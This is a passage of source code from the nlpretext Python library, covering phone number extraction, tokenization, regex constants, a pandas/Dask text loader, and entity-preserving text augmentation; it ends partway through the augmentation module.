24 | def find_phone_numbers(string: str, region_code: Optional[str] = None) -> List[str]:
25 | """
26 | Python port of Google's libphonenumber.
27 | https://github.com/daviddrysdale/python-phonenumbers.
28 |
29 | Parameters
30 | ----------
31 | region_code : str, optional
32 | If specified, will find numbers formatted for the specified country.
33 | eg. 06.00.00.00.00 if "FR" is specified.
34 |
35 | If not specified, only works for international-formatted phone numbers.
36 | - ie. phone number with +country code specified
37 | eg. 06.00.00.00.00 will return an error but +33 6 00 00 00 00 will work.
38 | supported value: look SUPPORTED_COUNTRY variable.
39 |
40 | Returns
41 | -------
42 | list
43 | list of matched phone numbers.
44 |
45 | Raises
46 | ------
47 | ValueError
48 | if country code is not supported.
49 | """
50 | if region_code not in SUPPORTED_COUNTRY:
51 | raise ValueError("Please enter a valid country code. See SUPPORTED_COUNTRY list.")
52 | return [match.raw_string for match in _phonenumbers.PhoneNumberMatcher(string, region_code)]
53 |
54 |
55 | def extract_phone_numbers(text: str, countrylist: List[Optional[str]]) -> List[str]:
56 | """
57 | Find phone numbers in a text, returns a list of phone numbers.
58 |
59 | Parameters
60 | ----------
61 | text : str
62 | countrylist : list (eg. [None,'FR','US','GB'])
63 | Look for phone numbers formatted according to the specified countrylist.
64 | supported value: look SUPPORTED_COUNTRY variable.
65 |
66 | Returns
67 | -------
68 | list
69 | List of unique phone numbers found.
70 | """
71 | all_phone_numbers: List[str] = []
72 | for country in countrylist:
73 | new_numbers_founds = find_phone_numbers(text, region_code=country)
74 | all_phone_numbers.extend(new_numbers_founds)
75 | return list(set(all_phone_numbers))
76 |
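# Hedged usage sketch (fictitious numbers; None lets international formats match):
#
#     extract_phone_numbers("Call +33 6 00 00 00 00 or 02 99 00 00 00", countrylist=[None, "FR"])
#     # -> e.g. ["+33 6 00 00 00 00", "02 99 00 00 00"]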
77 |
78 | class PhoneParser:
79 | """
80 | Python port of Google's libphonenumber.
81 | https://github.com/daviddrysdale/python-phonenumbers.
82 | """
83 |
84 | def __init__(self):
85 | self.region_code = None
86 | self.text = None
87 | self.parsed_num: Optional[_phonenumbers.PhoneNumber] = None
88 |
89 | @property
90 | def parsed_num(self) -> Optional[_phonenumbers.PhoneNumber]:
91 | return self.__parsed_num
92 |
93 | @parsed_num.setter
94 | def parsed_num(self, value: Optional[_phonenumbers.PhoneNumber]) -> None:
95 | self.__parsed_num = value
96 |
97 | def parse_number(
98 | self, text: str, region_code: Optional[str] = None
99 | ) -> Optional[_phonenumbers.PhoneNumber]:
100 | """
101 | Extract phone number from text.
102 |
103 | Parameters
104 | ----------
105 | text: str
106 | region_code : str, optional
107 | If specified, will find numbers formatted for the specified country.
108 | eg. 06.00.00.00.00 if "FR" is specified.
109 | If not specified, only works for international-formatted phone numbers.
110 | - ie. phone number with +country code specified
111 | eg. 06.00.00.00.00 will return an error but +33 6 00 00 00 00 will work.
112 | supported value: look SUPPORTED_COUNTRY variable.
113 |
114 | Returns
115 | -------
116 | str
117 | The parsed number
118 |
119 | Raises
120 | ------
121 | NumberParseException
122 | If the string doesn't contain a phone number or if the parser fails.
123 | """
124 | self.region_code = region_code
125 | self.text = text
126 | self.parsed_num: Optional[_phonenumbers.PhoneNumber] = _phonenumbers.parse(
127 | self.text, self.region_code
128 | )
129 | return self.parsed_num
130 |
131 | def format_number(self, num_format: str) -> str:
132 | """
133 | Convert a phone number to another standard format.
134 |
135 | Parameters
136 | ----------
137 | num_format : str {'E164','INTERNATIONAL','NATIONAL','RFC3966'}
138 |
139 | Returns
140 | -------
141 | str
142 | Number formatted
143 | """
144 | standard_format = FORMAT_NUMBERS.get(num_format)
145 | if standard_format is None:
146 | raise ValueError(f"Please choose a num_format in {list(FORMAT_NUMBERS.keys())}")
147 | if self.parsed_num is None:
148 | raise ValueError(f"Could not parse phone number {self.parsed_num}")
149 | formatted_number: Optional[str] = _phonenumbers.format_number(
150 | self.parsed_num, standard_format
151 | )
152 | if formatted_number is None:
153 | raise ValueError(f"Could not format phone number {formatted_number}")
154 | return formatted_number
155 |
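# Minimal sketch of the PhoneParser round trip (fictitious number; "FR" must be a
# supported region):
if __name__ == "__main__":
    parser = PhoneParser()
    parser.parse_number("06 00 00 00 00", region_code="FR")
    print(parser.format_number("E164"))  # e.g. "+33600000000"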
--------------------------------------------------------------------------------
/nlpretext/token/tokenizer.py:
--------------------------------------------------------------------------------
1 | # GNU Lesser General Public License v3.0 only
2 | # Copyright (C) 2020 Artefact
3 | # licence-information@artefact.com
4 | #
5 | # This program is free software; you can redistribute it and/or
6 | # modify it under the terms of the GNU Lesser General Public
7 | # License as published by the Free Software Foundation; either
8 | # version 3 of the License, or (at your option) any later version.
9 | #
10 | # This program is distributed in the hope that it will be useful,
11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
13 | # Lesser General Public License for more details.
14 | #
15 | # You should have received a copy of the GNU Lesser General Public License
16 | # along with this program; if not, write to the Free Software Foundation,
17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
18 | # mypy: disable-error-code="assignment"
19 |
20 | from typing import Any, List, Optional, Union
21 |
22 | import os
23 | import re
24 |
25 | import nltk
26 | import spacy
27 | from sacremoses import MosesDetokenizer, MosesTokenizer
28 |
29 | MODEL_REGEX = re.compile(r"^[a-z]{2}_(?:core|dep|ent|sent)_(?:web|news|wiki|ud)_(?:sm|md|lg|trf)$")
30 | SUPPORTED_LANG_MODULES = {"en_spacy", "en_nltk", "fr_spacy", "fr_moses", "ko_spacy", "ja_spacy"}
31 |
32 |
33 | class LanguageNotHandled(Exception):
34 | pass
35 |
36 |
37 | class LanguageNotInstalledError(Exception):
38 | pass
39 |
40 |
41 | class SpacyModel:
42 | class SingletonSpacyModel:
43 | def __init__(self, lang: str) -> None:
44 | self.lang = lang
45 | if lang == "en":
46 | self.model = _load_spacy_model("en_core_web_sm")
47 | elif lang == "fr":
48 | self.model = _load_spacy_model("fr_core_news_sm")
49 | elif lang == "ko":
50 | self.model = spacy.blank("ko")
51 | elif lang == "ja":
52 | self.model = spacy.blank("ja")
53 | else:
54 | raise (LanguageNotHandled("This spacy model is not available"))
55 |
56 | model: Optional[spacy.language.Language] = None
57 |
58 | def __init__(self, lang):
59 | if not SpacyModel.model:
60 | SpacyModel.model = SpacyModel.SingletonSpacyModel(lang).model
61 |
62 | def get_lang_model(self) -> Optional[str]: # noqa: D102
63 | if self.model:
64 | lang: str = self.model.lang
65 | return lang
66 | return None
67 |
68 |
69 | def _load_spacy_model(model: str) -> Any:
70 | try:
71 | return spacy.load(model)
72 | except OSError as e:
73 | if MODEL_REGEX.match(model):
74 | os.system(f"python -m spacy download {model}") # nosec
75 | return spacy.load(model)
76 | else:
77 | raise LanguageNotInstalledError(
78 | f"Model {model} is not installed. "
79 | f"To install, run: python -m spacy download {model}"
80 | ) from e
81 |
82 |
83 | def _get_spacy_tokenizer(lang: str) -> Optional[spacy.tokenizer.Tokenizer]:
84 | """
85 | Function that gets the right tokenizer given the language.
86 |
87 | Parameters
88 | ----------
89 | lang : str
90 | Language in which text is written. Languages handled: ["en", "fr", "ko", "ja"]
91 |
92 | Returns
93 | -------
94 | spacy.tokenizer.Tokenizer
95 | spacy tokenizer
96 | """
97 | model = SpacyModel(lang).model
98 | if model:
99 | return model.tokenizer
100 | return None
101 |
102 |
103 | def tokenize(text: str, lang_module: str = "en_spacy") -> List[str]:
104 | """
105 | Convert text to a list of tokens.
106 |
107 | Parameters
108 | ----------
109 | lang_module : str {'en_spacy', 'en_nltk', 'fr_spacy', 'fr_moses', 'ko_spacy', 'ja_spacy'}
110 | choose the tokenization module according to the language and the implementation.
111 | Recommended: spaCy (faster, better results). To process other languages,
112 | install the corresponding spaCy model.
113 |
114 | Returns
115 | -------
116 | list
117 | list of string
118 |
119 | Raises
120 | ------
121 | ValueError
122 | If lang_module is not a valid module name
123 | """
124 | if lang_module not in SUPPORTED_LANG_MODULES:
125 | raise ValueError(
126 | f"Invalid lang_module: {lang_module}. "
127 | f"lang_module must be one of {SUPPORTED_LANG_MODULES}."
128 | )
129 |
130 | tokenized_words: List[str] = []
131 | if "spacy" in lang_module:
132 | lang = lang_module.split("_")[0]
133 | spacymodel = _get_spacy_tokenizer(lang)
134 | if spacymodel:
135 | spacydoc = spacymodel(text)
136 | tokenized_words = [spacy_token.text for spacy_token in spacydoc]
137 | if lang_module == "en_nltk":
138 | tokenized_words = nltk.word_tokenize(text)
139 | if lang_module == "fr_moses":
140 | tokenized_words = MosesTokenizer(lang="fr").tokenize(text, escape=False)
141 |
142 | return tokenized_words
143 |
144 |
145 | def untokenize(tokens: List[str], lang: str = "fr") -> str:
146 | """
147 | Inputs a list of tokens, outputs a string.
148 | ["J'", 'ai'] >>> "J' ai".
149 |
150 | Parameters
151 | ----------
152 | lang : string
153 | language code
154 |
155 | Returns
156 | -------
157 | string
158 | text
159 | """
160 | d = MosesDetokenizer(lang=lang)
161 | text: str = d.detokenize(tokens, unescape=False)
162 | return text
163 |
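# Hedged round-trip sketch (en_spacy downloads en_core_web_sm on first use if it
# is missing):
#
#     tokens = tokenize("Let's eat, grandma.", lang_module="en_spacy")
#     # -> e.g. ["Let", "'s", "eat", ",", "grandma", "."]
#     untokenize(tokens, lang="en")
#     # -> "Let's eat, grandma."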
164 |
165 | def convert_tokens_to_string(tokens_or_str: Optional[Union[str, List[str]]]) -> str: # noqa: D103
166 | if isinstance(tokens_or_str, str):
167 | return tokens_or_str
168 | if isinstance(tokens_or_str, list):
169 | return untokenize(tokens_or_str)
170 | if tokens_or_str is None:
171 | return ""
172 | raise TypeError("Please input string or tokens")
173 |
174 |
175 | def convert_string_to_tokens( # noqa: D103
176 | tokens_or_str: Optional[Union[str, List[str]]], lang_module: str = "en_spacy"
177 | ) -> List[str]:
178 | if isinstance(tokens_or_str, str):
179 | return tokenize(tokens_or_str, lang_module=lang_module)
180 | if isinstance(tokens_or_str, list):
181 | return tokens_or_str
182 | if tokens_or_str is None:
183 | return []
184 | raise TypeError("Please input string or tokens")
185 |
--------------------------------------------------------------------------------
/nlpretext/_config/constants.py:
--------------------------------------------------------------------------------
1 | # Copyright (C) 2020 Artefact
2 | # licence-information@artefact.com
3 | #
4 | # Licensed under the Apache License, Version 2.0 (the "License");
5 | # you may not use this file except in compliance with the License.
6 | # You may obtain a copy of the License at
7 | #
8 | # http://www.apache.org/licenses/LICENSE-2.0
9 | #
10 | # Unless required by applicable law or agreed to in writing, software
11 | # distributed under the License is distributed on an "AS IS" BASIS,
12 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | # See the License for the specific language governing permissions and
14 | # limitations under the License
15 | # mypy: disable-error-code="attr-defined"
16 |
17 | """
18 | Collection of regular expressions and other (small, generally useful) constants.
19 | Credits to textacy for some of them: https://github.com/chartbeat-labs/textacy.
20 | """
21 | import re
22 | import sys
23 | import unicodedata
24 |
25 | import regex
26 |
27 | NUMERIC_NE_TYPES = {
28 | "ORDINAL",
29 | "CARDINAL",
30 | "MONEY",
31 | "QUANTITY",
32 | "PERCENT",
33 | "TIME",
34 | "DATE",
35 | }
36 | SUBJ_DEPS = {"agent", "csubj", "csubjpass", "expl", "nsubj", "nsubjpass"}
37 | OBJ_DEPS = {"attr", "dobj", "dative", "oprd"}
38 | AUX_DEPS = {"aux", "auxpass", "neg"}
39 |
40 | REPORTING_VERBS = {
41 | "according",
42 | "accuse",
43 | "acknowledge",
44 | "add",
45 | "admit",
46 | "agree",
47 | "allege",
48 | "announce",
49 | "argue",
50 | "ask",
51 | "assert",
52 | "believe",
53 | "blame",
54 | "charge",
55 | "cite",
56 | "claim",
57 | "complain",
58 | "concede",
59 | "conclude",
60 | "confirm",
61 | "contend",
62 | "criticize",
63 | "declare",
64 | "decline",
65 | "deny",
66 | "describe",
67 | "disagree",
68 | "disclose",
69 | "estimate",
70 | "explain",
71 | "fear",
72 | "hope",
73 | "insist",
74 | "maintain",
75 | "mention",
76 | "note",
77 | "observe",
78 | "order",
79 | "predict",
80 | "promise",
81 | "recall",
82 | "recommend",
83 | "reply",
84 | "report",
85 | "say",
86 | "state",
87 | "stress",
88 | "suggest",
89 | "tell",
90 | "testify",
91 | "think",
92 | "urge",
93 | "warn",
94 | "worry",
95 | "write",
96 | }
97 |
98 | CURRENCIES = {
99 | "$": "USD",
100 | "zł": "PLN",
101 | "£": "GBP",
102 | "¥": "JPY",
103 | "฿": "THB",
104 | "₡": "CRC",
105 | "₦": "NGN",
106 | "₩": "KRW",
107 | "₪": "ILS",
108 | "₫": "VND",
109 | "€": "EUR",
110 | "₱": "PHP",
111 | "₲": "PYG",
112 | "₴": "UAH",
113 | "₹": "INR",
114 | }
115 |
116 | POS_REGEX_PATTERNS = {
117 | "en": {
118 | "NP": r"<DET>? <NUM>* (<ADJ> <PUNCT>? <CONJ>?)* (<NOUN>|<PROPN> <PART>?)+",
119 | "PP": r"<PREP> <DET>? <NUM>* (<ADJ> <PUNCT>? <CONJ>?)* (<NOUN> <PART>?)+",
120 | "VP": r"<AUX>* <ADV>* <VERB>",
121 | }
122 | }
123 |
124 | PUNCT_TRANSLATE_UNICODE = dict.fromkeys(
125 | (i for i in range(sys.maxunicode) if unicodedata.category(chr(i)).startswith("P")),
126 | " ",
127 | )
128 |
129 |
130 | ACRONYM_REGEX = re.compile(
131 | r"(?:^|(?<=\W))(?:(?:(?:(?:[A-Z]\.?)+[a-z0-9&/-]?)+(?:[A-Z][s.]?|[0-9]s?))|(?:[0-9](?:\-?[A-Z])+))(?:$|(?=\W))",
132 | flags=re.UNICODE,
133 | )
134 | EMAIL_REGEX = re.compile(
135 | r"(?:^|(?<=[^\w@.)]))([\w+-](\.(?!\.))?)*?[\w+-]@(?:\w-?)*?\w+(\.([a-z]{2,})){1,3}(?:$|(?=\b))",
136 | flags=re.IGNORECASE | re.UNICODE,
137 | )
138 | PHONE_REGEX = re.compile(
139 | r"(?:^|(?<=[^\w)]))(\+?1[ .-]?)?(\(?\d{3}\)?[ .-]?)?(\d{3}[ .-]?\d{4})(\s?(?:ext\.?|[#x-])\s?\d{2,6})?(?:$|(?=\W))" # noqa: E501
140 | )
141 | NUMBERS_REGEX = re.compile(
142 | r"(?:^|(?<=[^\w,.]))[+–-]?(([1-9]\d{0,2}(,\d{3})+(\.\d*)?)|([1-9]\d{0,2}([ .]\d{3})+(,\d*)?)|"
143 | r"(\d*?[.,]\d+)|\d+)(?:$|(?=\b))"
144 | )
145 | CURRENCY_REGEX = re.compile("({})+".format("|".join(re.escape(c) for c in CURRENCIES)))
146 | LINEBREAK_REGEX = re.compile(r"((\r\n)|[\n\v])+")
147 | NONBREAKING_SPACE_REGEX = re.compile(r"(?!\n)\s+")
148 | URL_REGEX = re.compile(
149 | r"(?:^|(?<![\w/.]))"
150 | # protocol identifier
151 | r"(?:(?:https?://|ftp://|www\d{0,3}\.))"
152 | # user:pass authentication
153 | r"(?:\S+(?::\S*)?@)?"
154 | r"(?:"
155 | # IP address exclusion
156 | # private & local networks
157 | r"(?!(?:10|127)(?:\.\d{1,3}){3})"
158 | r"(?!(?:169\.254|192\.168)(?:\.\d{1,3}){2})"
159 | r"(?!172\.(?:1[6-9]|2\d|3[0-1])(?:\.\d{1,3}){2})"
160 | # IP address dotted notation octets
161 | # excludes loopback network 0.0.0.0
162 | # excludes reserved space >= 224.0.0.0
163 | # excludes network & broadcast addresses
164 | # (first & last IP address of each class)
165 | r"(?:[1-9]\d?|1\d\d|2[01]\d|22[0-3])"
166 | r"(?:\.(?:1?\d{1,2}|2[0-4]\d|25[0-5])){2}"
167 | r"(?:\.(?:[1-9]\d?|1\d\d|2[0-4]\d|25[0-4]))"
168 | r"|"
169 | # host name
170 | r"(?:(?:[a-z\u00a1-\uffff0-9]-?)*[a-z\u00a1-\uffff0-9]+)"
171 | # domain name
172 | r"(?:\.(?:[a-z\u00a1-\uffff0-9]-?)*[a-z\u00a1-\uffff0-9]+)*"
173 | # TLD identifier
174 | r"(?:\.(?:[a-z\u00a1-\uffff]{2,}))" r")"
175 | # port number
176 | r"(?::\d{2,5})?"
177 | # resource path
178 | r"(?:/\S*)?" r"(?:$|(?![\w?!+&/]))",
179 | flags=re.UNICODE | re.IGNORECASE,
180 | ) # source: https://gist.github.com/dperini/729294
181 | SHORT_URL_REGEX = re.compile(
182 | r"(?:^|(?<![\w/.]))"
183 | # optional scheme
184 | r"(?:(?:https?://)?)"
185 | # domain
186 | r"(?:\w-?)*?\w+(?:\.[a-z]{2,12}){1,3}" r"/"
187 | # hash
188 | r"[^\s.,?!'\"|+]{2,12}" r"(?:$|(?![\w?!+&/]))",
189 | flags=re.IGNORECASE,
190 | )
218 | AT_PATTERN = re.compile(r"@\w*[a-zA-Z]+\w*")
219 | HASHTAG_PATTERN = re.compile(r"#\w*[a-zA-Z]+\w*")
220 | HTML_TAG_PATTERN = re.compile(r"<.*?>")
221 |
222 | # TEXT LOADER
223 | TEXT_FILE_FORMATS_PATTERN = re.compile(r"^.*\.(json|csv|txt|parquet)(\.gz|\.zip)*$")
224 |
--------------------------------------------------------------------------------
/nlpretext/textloader.py:
--------------------------------------------------------------------------------
1 | # Copyright (C) 2020 Artefact
2 | # licence-information@artefact.com
3 | #
4 | # Licensed under the Apache License, Version 2.0 (the "License");
5 | # you may not use this file except in compliance with the License.
6 | # You may obtain a copy of the License at
7 | #
8 | # http://www.apache.org/licenses/LICENSE-2.0
9 | #
10 | # Unless required by applicable law or agreed to in writing, software
11 | # distributed under the License is distributed on an "AS IS" BASIS,
12 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | # See the License for the specific language governing permissions and
14 | # limitations under the License
15 | from types import ModuleType
16 | from typing import Any, List, Optional, Union
17 |
18 | import sys
19 | import warnings
20 |
21 | import pandas as pd
22 |
23 | try:
24 | from nlpretext._utils import daskloader
25 | except ImportError:
26 | warnings.warn(
27 | "Dask not found, switching to pandas. To be able to use Dask, run: pip install nlpretext[dask]", # noqa: E501
28 | stacklevel=2,
29 | )
30 |
31 | from nlpretext._utils import pandasloader
32 | from nlpretext._utils.file_loader import check_text_file_format
33 | from nlpretext.preprocessor import Preprocessor
34 |
35 |
36 | class TextLoader:
37 | def __init__(self, text_column="text", encoding="utf-8", file_format=None, use_dask=True):
38 | """
39 | Initialize DataLoader object to retrieve text data.
40 |
41 | Parameters
42 | ----------
43 | text_column: string
44 | name of the column containing texts in json / csv / parquet files
45 | encoding: string
46 | encoding of the text to be loaded, can be utf-8 or latin-1 for example
47 | file_format: string | None
48 | format of the files to be loaded
49 | use_dask: bool
50 | use dask to load text
51 | """
52 | self.text_column = text_column
53 | self.encoding = encoding
54 | self.file_format = file_format
55 |
56 | self.use_dask = use_dask
57 |
58 | self.loader: ModuleType
59 | if self.use_dask:
60 | if "dask" in sys.modules:
61 | self.loader = daskloader
62 | else:
63 | warnings.warn(
64 | "Dask is not installed, switching to pandas. Run pip install dask to use dask",
65 | stacklevel=2,
66 | )
67 | self.use_dask = False
68 | self.loader = pandasloader
69 | else:
70 | self.loader = pandasloader
71 |
72 | def __repr__(self):
73 | """Method to represent class attributes."""
74 | class_repr_dict = {
75 | "text_column": self.text_column,
76 | "encoding": self.encoding,
77 | "file_format": self.file_format,
78 | "use_dask": self.use_dask,
79 | }
80 | return f"TextLoader({class_repr_dict})"
81 |
82 | def _read_text_txt(self, files_path):
83 | """
84 | Read txt text files stored in files_path.
85 |
86 | Parameters
87 | ----------
88 | files_path : string | list[string]
89 | single or multiple files path
90 |
91 | Returns
92 | -------
93 | dask.dataframe | pandas.DataFrame
94 | """
95 | text_ddf = self.loader.read_text(files_path, encoding=self.encoding)
96 | text_ddf.columns = [self.text_column]
97 | return text_ddf
98 |
99 | def _read_text_json(self, files_path):
100 | """
101 | Read json text files stored in files_path.
102 |
103 | Parameters
104 | ----------
105 | files_path : string | list[string]
106 | single or multiple files path
107 |
108 | Returns
109 | -------
110 | dask.dataframe | pandas.DataFrame
111 | """
112 | text_ddf = self.loader.read_json(files_path, encoding=self.encoding)
113 | try:
114 | return text_ddf[[self.text_column]]
115 | except KeyError as e:
116 | raise KeyError(f"Specified text_column '{self.text_column}' not in file keys") from e
117 |
118 | def _read_text_csv(self, files_path):
119 | """
120 | Read csv text files stored in files_path.
121 |
122 | Parameters
123 | ----------
124 | files_path : string | list[string]
125 |             single or multiple file paths
126 |
127 | Returns
128 | -------
129 | dask.dataframe | pandas.DataFrame
130 | """
131 | text_ddf = self.loader.read_csv(files_path, encoding=self.encoding)
132 | try:
133 | return text_ddf[[self.text_column]]
134 | except KeyError as e:
135 | raise KeyError(f"Specified text_column '{self.text_column}' not in file keys") from e
136 |
137 | def _read_text_parquet(self, files_path):
138 | """
139 | Read parquet text files stored in files_path.
140 |
141 | Parameters
142 | ----------
143 | files_path : string | list[string]
144 |             single or multiple file paths
145 |
146 | Returns
147 | -------
148 | dask.dataframe | pandas.DataFrame
149 | """
150 | text_ddf = self.loader.read_parquet(files_path, encoding=self.encoding)
151 | try:
152 | return text_ddf[[self.text_column]]
153 | except KeyError as e:
154 | raise KeyError(f"Specified text_column '{self.text_column}' not in file keys") from e
155 |
156 | def read_text(
157 | self,
158 | files_path: Union[str, List[str]],
159 | file_format: Optional[str] = None,
160 | encoding: Optional[str] = None,
161 | compute_to_pandas: bool = True,
162 | preprocessor: Optional[Preprocessor] = None,
163 | ) -> Union[pd.DataFrame, Any]:
164 | """
165 | Read the text files stored in files_path.
166 |
167 | Parameters
168 | ----------
169 | files_path: string | list[string]
170 |             single or multiple file paths
171 |         file_format: string | None
172 | Format of the files to be loaded, to be selected among csv, json, parquet or txt
173 |         encoding: string | None
174 | encoding of the text to be loaded, can be utf-8 or latin-1 for example
175 | compute_to_pandas: bool
176 |             True to compute the Dask DataFrame to a pandas DataFrame before returning, False otherwise
177 | preprocessor: nlpretext.preprocessor.Preprocessor
178 | NLPretext preprocessor can be specified to pre-process text after loading
179 |
180 | Returns
181 | -------
182 | dask.dataframe | pandas.DataFrame
183 | """
184 | if encoding is not None:
185 | self.encoding = encoding
186 |
187 | if file_format is not None:
188 | self.file_format = file_format
189 | else:
190 | self.file_format = check_text_file_format(files_path)
191 |
192 | reader_mapping = {
193 | "csv": self._read_text_csv,
194 | "txt": self._read_text_txt,
195 | "json": self._read_text_json,
196 | "parquet": self._read_text_parquet,
197 | }
198 | reader = reader_mapping.get(self.file_format)
199 | if reader is None:
200 |             raise ValueError(f"Format not handled: {self.file_format}")
201 | text = reader(files_path)
202 |
203 | if preprocessor is not None:
204 | if isinstance(preprocessor, Preprocessor):
205 |                 text[self.text_column] = text[self.text_column].apply(preprocessor.run)
206 |             else:
207 |                 raise ValueError("Only NLPretext preprocessors can be specified")
208 |
209 |         if compute_to_pandas and self.use_dask:
210 |             return text.compute()
211 |         return text
212 |
--------------------------------------------------------------------------------
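A minimal usage sketch for the TextLoader above, assuming a local CSV file; the
"reviews.csv" path and the default Preprocessor() pipeline are placeholders:

    from nlpretext.preprocessor import Preprocessor
    from nlpretext.textloader import TextLoader

    # use_dask=False forces the pandas loader; with use_dask=True the class
    # falls back to pandas anyway (with a warning) when dask is not installed.
    loader = TextLoader(text_column="text", use_dask=False)
    df = loader.read_text("reviews.csv", file_format="csv", preprocessor=Preprocessor())
    print(df.head())

--------------------------------------------------------------------------------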
/nlpretext/augmentation/text_augmentation.py:
--------------------------------------------------------------------------------
1 | from typing import Any, Dict, List, Optional, Tuple, Union
2 |
3 | import logging
4 | import re
5 | from itertools import combinations
6 |
7 | import nlpaug.augmenter.word as naw
8 |
9 |
10 | class CouldNotAugment(ValueError): # noqa: D101
11 | pass
12 |
13 |
14 | class UnavailableAugmenter(ValueError): # noqa: D101
15 | pass
16 |
17 |
18 | def augment_text(
19 | text: str,
20 | method: str,
21 | stopwords: Optional[List[str]] = None,
22 | entities: Optional[List[Dict[str, Any]]] = None,
23 | ) -> Tuple[str, List[Dict[str, Any]]]:
24 | """
25 | Given a text with or without associated entities, generate a new text by
26 |     modifying some words in the initial one; the modifications depend on the
27 |     chosen method (substitution with synonym, addition, deletion). If entities
28 |     are given as input, they will remain unchanged. If you want words other
29 |     than entities to remain unchanged, specify them via the stopwords argument.
30 |
31 | Parameters
32 | ----------
33 | text : string
34 | method : {'wordnet_synonym', 'aug_sub_bert'}
35 | augmenter to use ('wordnet_synonym' or 'aug_sub_bert')
36 | stopwords : list, optional
37 | list of words to freeze throughout the augmentation
38 | entities : list, optional
39 | entities associated to text if any, must be in the following format:
40 | [
41 | {
42 | 'entity': str,
43 | 'word': str,
44 | 'startCharIndex': int,
45 | 'endCharIndex': int
46 | },
47 | {
48 | ...
49 | }
50 | ]
51 |
52 | Returns
53 | -------
54 | Augmented text and optional augmented entities
55 | """
56 | augmenter = get_augmenter(method, stopwords)
57 | augmented_text = augmenter.augment(text)
58 | if entities is not None:
59 | return process_entities_and_text(entities, text, augmented_text)
60 | return augmented_text, []
61 |
62 |
63 | def process_entities_and_text(
64 | entities: List[Dict[str, Any]], text: str, augmented_text: str
65 | ) -> Tuple[str, List[Dict[str, Any]]]:
66 | """
67 | Given a list of initial entities, verify that they have not been altered by
68 | the data augmentation operation and are still in the augmented text.
69 |
70 | Parameters
71 | ----------
72 | entities: list
73 | entities associated to text, must be in the following format:
74 | [
75 | {
76 | 'entity': str,
77 | 'word': str,
78 | 'startCharIndex': int,
79 | 'endCharIndex': int
80 | },
81 | {
82 | ...
83 | }
84 | ]
85 | text: str
86 | initial text
87 | augmented_text: str
88 | new text resulting of data augmentation operation
89 |
90 | Returns
91 | -------
92 | Augmented text and entities with their updated position in augmented text
93 | """
94 |     formatted_entities = [
95 |         (
96 |             text[entity["startCharIndex"] : entity["endCharIndex"]].strip(),
97 |             entity["entity"],
98 |         )
99 |         for entity in entities
100 |     ]
101 | if are_entities_in_augmented_text(entities, augmented_text):
102 | augmented_entities = get_augmented_entities(augmented_text, formatted_entities)
103 | clean_entities = clean_sentence_entities(augmented_text, augmented_entities)
104 | return augmented_text, clean_entities
105 | raise CouldNotAugment("Text was not correctly augmented because entities were altered")
106 |
107 |
108 | def are_entities_in_augmented_text(entities: List[Dict[str, Any]], augmented_text: str) -> bool:
109 | """
110 | Given a list of entities, check if all the words associated to each entity
111 | are still present in augmented text.
112 |
113 | Parameters
114 | ----------
115 | entities : list
116 | entities associated to initial text, must be in the following format:
117 | [
118 | {
119 | 'entity': str,
120 | 'word': str,
121 | 'startCharIndex': int,
122 | 'endCharIndex': int
123 | },
124 | {
125 | ...
126 | }
127 | ]
128 | augmented_text : str
129 |
130 | Returns
131 | -------
132 | True if all entities are present in augmented text, False otherwise
133 | """
134 |     # Every entity word must still appear verbatim in the augmented text;
135 |     # a single altered entity is enough to reject the augmentation.
136 |     for ent in entities:
137 |         if ent["word"] not in augmented_text:
138 |             return False
139 |     return True
140 |
141 |
142 | def get_augmenter(method: str, stopwords: Optional[List[str]] = None) -> Union[naw.SynonymAug, naw.ContextualWordEmbsAug]:  # noqa: E501
143 | """
144 | Initialize an augmenter depending on the given method.
145 |
146 | Parameters
147 | ----------
148 | method : str (supported methods: wordnet_synonym and aug_sub_bert)
149 | stopwords : list
150 | list of words to freeze throughout the augmentation
151 |
152 | Returns
153 | -------
154 | Initialized nlpaug augmenter
155 | """
156 | if method == "wordnet_synonym":
157 | return naw.SynonymAug(aug_src="wordnet", stopwords=stopwords)
158 | if method == "aug_sub_bert":
159 | return naw.ContextualWordEmbsAug(
160 | model_path="bert-base-uncased", action="substitute", stopwords=stopwords
161 | )
162 | raise UnavailableAugmenter(
163 |         "The given augmenter is not supported. You must choose one "
164 |         "of the following: wordnet_synonym or aug_sub_bert"
165 | )
166 |
167 |
168 | def get_augmented_entities(
169 | sentence_augmented: str, entities: List[Tuple[str, Any]]
170 | ) -> List[Dict[str, Any]]:
171 | """
172 | Get entities with updated positions (start and end) in augmented text.
173 |
174 | Parameters
175 | ----------
176 | sentence_augmented : str
177 | augmented text
178 | entities : list
179 | entities associated to initial text, must be in the following format:
180 | [
181 | {
182 | 'entity': str,
183 | 'word': str,
184 | 'startCharIndex': int,
185 | 'endCharIndex': int
186 | },
187 | {
188 | ...
189 | }
190 | ]
191 |
192 | Returns
193 | -------
194 | Entities with updated positions related to augmented text
195 | """
196 | entities_augmented = []
197 | for entity in entities:
198 |         search = re.search(re.escape(entity[0].strip()), sentence_augmented)
199 | if search:
200 | start_index = search.start()
201 | end_index = search.end()
202 | new_entity = {
203 | "entity": entity[1],
204 | "word": sentence_augmented[start_index:end_index],
205 | "startCharIndex": start_index,
206 | "endCharIndex": end_index,
207 | }
208 | entities_augmented.append(new_entity)
209 | return entities_augmented
210 |
211 |
212 | def clean_sentence_entities(text: str, entities: List[Dict[str, Any]]) -> List[Dict[str, Any]]:
213 | """
214 |     Pairwise check of entities to remove nested ones; the longest entity is kept.
215 |
216 | Parameters
217 | ----------
218 | text : str
219 | augmented text
220 | entities : list
221 | entities associated to augmented text, must be in the following format:
222 | [
223 | {
224 | 'entity': str,
225 | 'word': str,
226 | 'startCharIndex': int,
227 | 'endCharIndex': int
228 | },
229 | {
230 | ...
231 | }
232 | ]
233 |
234 | Returns
235 | -------
236 | Cleaned entities
237 | """
238 | entities_to_clean = [dict(s) for s in {frozenset(d.items()) for d in entities}]
239 | for element1, element2 in combinations(entities_to_clean, 2):
240 | result = check_interval_included(element1, element2)
241 | if result is not None:
242 |             try:
243 |                 entities_to_clean.remove(result[0])
244 |             except ValueError:
245 |                 # list.remove raises ValueError when the entity is already gone
246 |                 logging.warning(
247 |                     "Can't remove entity: {}\nentities are now: {}\nfor sentence: {}".format(
248 |                         result, entities_to_clean, text
249 |                     )
250 |                 )
